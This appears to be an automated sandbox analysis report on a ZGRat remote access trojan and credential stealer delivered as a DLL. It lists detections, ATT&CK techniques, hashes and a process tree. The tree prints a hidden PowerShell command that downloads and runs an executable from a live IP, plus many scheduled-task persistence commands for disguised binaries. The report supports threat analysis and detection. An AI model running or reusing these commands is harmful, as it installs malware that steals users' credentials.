zgrat | 623afd3e2835f4a6b597f7aeec9301521778e3f82365d745e81de37f800bd1b7

Analysis

max time kernel
148s
max time network
151s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
11-05-2024 22:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Sh1t (1).dll
Size

12.3MB
MD5

8d1e6c16a13ef1b1d8d681d6aa920e67
SHA1

1f061ab5845a9ab887f1f1367016fc9600517e08
SHA256

623afd3e2835f4a6b597f7aeec9301521778e3f82365d745e81de37f800bd1b7
SHA512

b8052b50d8c7b25bacd4831417a83e6e40d351c712071f3cdceb167e498037e88e5b219646090a8f09e0b0246204432d5e28e1b644a640af332acf11d3ae35a6
SSDEEP

196608:Hf8xXyVKVap/Xq/pefvyKEpb6O9DNe23Nn1cRTi+VVYAePVeRgUQWoWzUB+:/f1tqBefvTOhg0GrVY78oR0

Score

10^/10

zgrat execution rat spyware stealer

Malware Config

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral1/files/0x000100000002aa01-47.dat	family_zgrat_v1
behavioral1/files/0x000200000002aa03-67.dat	family_zgrat_v1
behavioral1/memory/2148-69-0x0000000000220000-0x0000000000428000-memory.dmp	family_zgrat_v1

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4660	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1448	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5048	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2200	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4716	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	744	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4864	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2028	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4448	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3032	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1900	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1860	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4756	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1920	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4080	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	236	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4964	2952	schtasks.exe	90
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	984	2952	schtasks.exe	90

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
1	5044	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
5044	powershell.exe
5044	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 5 IoCs

pid	Process
456	1.exe
5016	Cheat.sfx.exe
1460	tzidRecG.exe
2148	HyperPortsavesmonitor.exe
5060	SppExtComObj.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1240	rundll32.exe
1240	rundll32.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\SppExtComObj.exe	HyperPortsavesmonitor.exe
File created	C:\Program Files (x86)\Microsoft.NET\RedistList\e1ef82546f0b02	HyperPortsavesmonitor.exe
File created	C:\Program Files (x86)\Google\Update\explorer.exe	HyperPortsavesmonitor.exe
File created	C:\Program Files (x86)\Google\Update\7a0fd90576e088	HyperPortsavesmonitor.exe

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\Speech_OneCore\Engines\TTS\en-US\NUSData\dllhost.exe	HyperPortsavesmonitor.exe
File created	C:\Windows\Speech_OneCore\Engines\TTS\en-US\NUSData\5940a34987c991	HyperPortsavesmonitor.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4476	5016	WerFault.exe	85

Creates scheduled task(s) 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4660	schtasks.exe
4448	schtasks.exe
1920	schtasks.exe
4080	schtasks.exe
2200	schtasks.exe
4716	schtasks.exe
744	schtasks.exe
4864	schtasks.exe
1860	schtasks.exe
4964	schtasks.exe
984	schtasks.exe
1448	schtasks.exe
3032	schtasks.exe
1900	schtasks.exe
236	schtasks.exe
5048	schtasks.exe
2028	schtasks.exe
4756	schtasks.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings	tzidRecG.exe
Key created	\REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings	HyperPortsavesmonitor.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1240	rundll32.exe
1240	rundll32.exe
5044	powershell.exe
5044	powershell.exe
1240	rundll32.exe
1240	rundll32.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe
2148	HyperPortsavesmonitor.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5044	powershell.exe
Token: SeDebugPrivilege	2148	HyperPortsavesmonitor.exe
Token: SeDebugPrivilege	5060	SppExtComObj.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 1240 wrote to memory of 5044	1240	rundll32.exe	81
PID 1240 wrote to memory of 5044	1240	rundll32.exe	81
PID 5044 wrote to memory of 456	5044	powershell.exe	84
PID 5044 wrote to memory of 456	5044	powershell.exe	84
PID 5044 wrote to memory of 456	5044	powershell.exe	84
PID 456 wrote to memory of 5016	456	1.exe	85
PID 456 wrote to memory of 5016	456	1.exe	85
PID 456 wrote to memory of 5016	456	1.exe	85
PID 456 wrote to memory of 1460	456	1.exe	88
PID 456 wrote to memory of 1460	456	1.exe	88
PID 456 wrote to memory of 1460	456	1.exe	88
PID 1460 wrote to memory of 2496	1460	tzidRecG.exe	89
PID 1460 wrote to memory of 2496	1460	tzidRecG.exe	89
PID 1460 wrote to memory of 2496	1460	tzidRecG.exe	89
PID 2496 wrote to memory of 5008	2496	WScript.exe	94
PID 2496 wrote to memory of 5008	2496	WScript.exe	94
PID 2496 wrote to memory of 5008	2496	WScript.exe	94
PID 5008 wrote to memory of 2148	5008	cmd.exe	96
PID 5008 wrote to memory of 2148	5008	cmd.exe	96
PID 2148 wrote to memory of 4056	2148	HyperPortsavesmonitor.exe	115
PID 2148 wrote to memory of 4056	2148	HyperPortsavesmonitor.exe	115
PID 4056 wrote to memory of 3916	4056	cmd.exe	117
PID 4056 wrote to memory of 3916	4056	cmd.exe	117
PID 4056 wrote to memory of 4052	4056	cmd.exe	118
PID 4056 wrote to memory of 4052	4056	cmd.exe	118
PID 4056 wrote to memory of 5060	4056	cmd.exe	119
PID 4056 wrote to memory of 5060	4056	cmd.exe	119

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\Sh1t (1).dll",#1
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -WindowStyle Hidden -command Invoke-WebRequest -Uri 'http://5.42.80.34/gm2.exe' -OutFile '1.exe'; Start-Process '1.exe'
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5044
- - C:\Users\Admin\AppData\Local\Temp\1.exe
    "C:\Users\Admin\AppData\Local\Temp\1.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:456
  - - C:\Users\Admin\AppData\Local\Temp\Cheat.sfx.exe
      "C:\Users\Admin\AppData\Local\Temp\Cheat.sfx.exe"
      4⤵
      Executes dropped EXE
      PID:5016
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 988
        5⤵
        Program crash
        
        PID:4476
  - - C:\Users\Admin\AppData\Local\Temp\tzidRecG.exe
      "C:\Users\Admin\AppData\Local\Temp\tzidRecG.exe"
      4⤵
      Executes dropped EXE
      Modifies registry class
      Suspicious use of WriteProcessMemory
      PID:1460
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\comDriverinto\yqpI0X0JgApYgtlSsocRWTSVHRK.vbe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2496
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\comDriverinto\ucUiAXPN2zx9bZrTcu4WHQVTQZueYbZneVkQGpMslSdQ.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5008
        
        C:\comDriverinto\HyperPortsavesmonitor.exe
        
        "C:\comDriverinto/HyperPortsavesmonitor.exe"
        7⤵
        Executes dropped EXE
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2148
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VOW7SnRUon.bat"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:4056
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:3916
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:4052
        
        C:\Program Files (x86)\Microsoft.NET\RedistList\SppExtComObj.exe
        
        "C:\Program Files (x86)\Microsoft.NET\RedistList\SppExtComObj.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5060

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 5016 -ip 5016
1⤵
PID:4668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Google\Update\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4660

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Google\Update\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5048

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\Speech_OneCore\Engines\TTS\en-US\NUSData\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2200

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\TTS\en-US\NUSData\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\TTS\en-US\NUSData\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:744

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 14 /tr "'C:\comDriverinto\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4864

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\comDriverinto\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\comDriverinto\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4448

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SppExtComObj.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1900

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\RedistList\SppExtComObj.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\NetHood\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4756

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\NetHood\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\NetHood\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4080

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HyperPortsavesmonitorH" /sc MINUTE /mo 9 /tr "'C:\comDriverinto\HyperPortsavesmonitor.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HyperPortsavesmonitor" /sc ONLOGON /tr "'C:\comDriverinto\HyperPortsavesmonitor.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "HyperPortsavesmonitorH" /sc MINUTE /mo 14 /tr "'C:\comDriverinto\HyperPortsavesmonitor.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:984

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1.exe

Filesize
2.3MB

MD5
2ce10fcd4e165a82a76f77d1f661fa36

SHA1
a3ffe8a330d9e2128172b74dd76f0a31060c0e1e

SHA256
21015dd4a12034f48c1432acbf1149131a3dd1412f4b8426ec7273d95dc19da6

SHA512
f2ed5af0ba9173d483943d7a3761ae2419232ec52980597dfc7ef9c79516297fd2df63970528faeed14f642fb1dbc00114d659068c33cc619ff70583da0bc818

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cheat.sfx.exe

Filesize
368KB

MD5
e56343f2eb88fef62d4cf5df0a2c7734

SHA1
21f1b3a3dcbc29388bb72bc7aa7fc4ce654c6135

SHA256
d3e4275fe34ac20bb9d3c53e9971d2a21ba8f7ec5dc8b943c1a52edb2aa0f1ea

SHA512
b56053c8f0f86ee235cce13601000ed31622b87a5b5b6ed7e723b94bc4a9281918feccbab1f99d827187982ad4d5de2eafb02dd8d6dd179b49e2e029eeef4f32

Download Submit
C:\Users\Admin\AppData\Local\Temp\VOW7SnRUon.bat

Filesize
240B

MD5
092897e758949b759c795b05f17b38c3

SHA1
18eeef4fb034a9527b58c354e4ce79040d3e3dff

SHA256
181c22b4a70ed3563c3a8bee0930fbe8c01db3711bd08644d3fc7d1446676593

SHA512
2926a6c4992409ba1871e6defacea79f7ac9a5519a309ae7ea6881f3936db9e7de8e2c354034c18fe6a004a174004ff335170d2f028869eadf9f99292012d79c

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nw145opj.voz.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tzidRecG.exe

Filesize
2.3MB

MD5
92a0909017b45d6498197b1b817e9303

SHA1
bc8a0aad4e4f3e6ddbd816a98873b24ba22bf502

SHA256
71fcb54017a98fe981d8b725891371518878e684acc63ca9c81f284f5e4b6e23

SHA512
b59ae5bd68f1ef934dbba306312c288f1e81b744cf717cff4a529f7b2ed779cd4f85d85e77b0589d1971d42896b8523b495ae1d81921d75cb7df43308940a021

Download Submit
C:\comDriverinto\HyperPortsavesmonitor.exe

Filesize
2.0MB

MD5
75da1def0cb2b50f387441c2ebed4120

SHA1
7eca930b9afe2bf57ab9a3e546cc9969d4e5dce7

SHA256
2edf5f9fc75dc5cc293db94f337b66524386b0a4d1fd6e56f3d7ad30963cc790

SHA512
adc14364c6e6d614f2a92b7094cced4ca247f96a27844c6601b3f2519de72d3215bb3335eae095363dd82edc2a3ff31b631c61df272c8cf023f72f8bcce737e1

Download Submit
C:\comDriverinto\ucUiAXPN2zx9bZrTcu4WHQVTQZueYbZneVkQGpMslSdQ.bat

Filesize
85B

MD5
97f25de6d41811f5f69377a04cfa76c7

SHA1
e1ff3b69aa65bbf38b49bf3972f739c0af5f6805

SHA256
caf5baa2d2e1705ecae3aa9e95212d2cde2141161defa5e19b7aa9fda05575f4

SHA512
d4af223a7e438d596655cdb1e4189792cf685b9c02f8e5ae0290eabbe29972d1182daaa98d39abf803d1e41b6eefa671d2ae3f051568cfba6adaaa77b8ad74eb

Download Submit
C:\comDriverinto\yqpI0X0JgApYgtlSsocRWTSVHRK.vbe

Filesize
236B

MD5
4ef5f91cd4fabd32da27992dacfc6ad6

SHA1
e6aae689706c107b9b6ff58e474df1d3fe1f16ff

SHA256
fc9b4a6b7b877ee52d56c5b1440de893d1b2bce5fbdf96c6233274af24a2cea7

SHA512
bc1698dc036031250e9dcb9c0d7b87271b1dc15fdaf63ef991aab195cdf9fe4056b2a4a164f46346cb9bfe63aa6c458555de43c9c96945f0f5752d983b1536b6

Download Submit
memory/1240-4-0x00007FFCE7A30000-0x00007FFCE8DB3000-memory.dmp

Filesize
19.5MB

Download
memory/1240-0-0x00007FFCE7A38000-0x00007FFCE8169000-memory.dmp

Filesize
7.2MB

Download
memory/1240-5-0x00007FFCE7A30000-0x00007FFCE8DB3000-memory.dmp

Filesize
19.5MB

Download
memory/1240-2-0x00007FFD09360000-0x00007FFD09362000-memory.dmp

Filesize
8KB

Download
memory/1240-1-0x00007FFD09350000-0x00007FFD09352000-memory.dmp

Filesize
8KB

Download
memory/2148-78-0x0000000002610000-0x0000000002628000-memory.dmp

Filesize
96KB

Download
memory/2148-76-0x0000000000CD0000-0x0000000000CE0000-memory.dmp

Filesize
64KB

Download
memory/2148-74-0x000000001B060000-0x000000001B0B0000-memory.dmp

Filesize
320KB

Download
memory/2148-73-0x00000000025F0000-0x000000000260C000-memory.dmp

Filesize
112KB

Download
memory/2148-69-0x0000000000220000-0x0000000000428000-memory.dmp

Filesize
2.0MB

Download
memory/2148-80-0x0000000000CE0000-0x0000000000CEE000-memory.dmp

Filesize
56KB

Download
memory/2148-71-0x0000000000C70000-0x0000000000C7E000-memory.dmp

Filesize
56KB

Download
memory/2148-82-0x0000000002650000-0x0000000002668000-memory.dmp

Filesize
96KB

Download
memory/2148-84-0x0000000000CF0000-0x0000000000CFC000-memory.dmp

Filesize
48KB

Download
memory/5016-64-0x0000000005220000-0x0000000005286000-memory.dmp

Filesize
408KB

Download
memory/5016-62-0x0000000005180000-0x0000000005212000-memory.dmp

Filesize
584KB

Download
memory/5016-61-0x0000000005690000-0x0000000005C36000-memory.dmp

Filesize
5.6MB

Download
memory/5016-59-0x0000000000730000-0x0000000000792000-memory.dmp

Filesize
392KB

Download
memory/5044-29-0x00007FFCE6F60000-0x00007FFCE7A22000-memory.dmp

Filesize
10.8MB

Download
memory/5044-18-0x00007FFCE6F60000-0x00007FFCE7A22000-memory.dmp

Filesize
10.8MB

Download
memory/5044-17-0x00007FFCE6F63000-0x00007FFCE6F65000-memory.dmp

Filesize
8KB

Download
memory/5044-14-0x00000257FAFA0000-0x00000257FAFC2000-memory.dmp

Filesize
136KB

Download
memory/5044-15-0x00000257E2900000-0x00000257E2910000-memory.dmp

Filesize
64KB

Download
memory/5044-16-0x00000257E2900000-0x00000257E2910000-memory.dmp

Filesize
64KB

Download
memory/5060-112-0x000000001D4F0000-0x000000001D4F9000-memory.dmp

Filesize
36KB

Download
memory/5060-113-0x000000001D560000-0x000000001D56D000-memory.dmp

Filesize
52KB

Download
memory/5060-115-0x000000001D590000-0x000000001D59B000-memory.dmp

Filesize
44KB

Download
memory/5060-114-0x000000001D570000-0x000000001D58E000-memory.dmp

Filesize
120KB

Download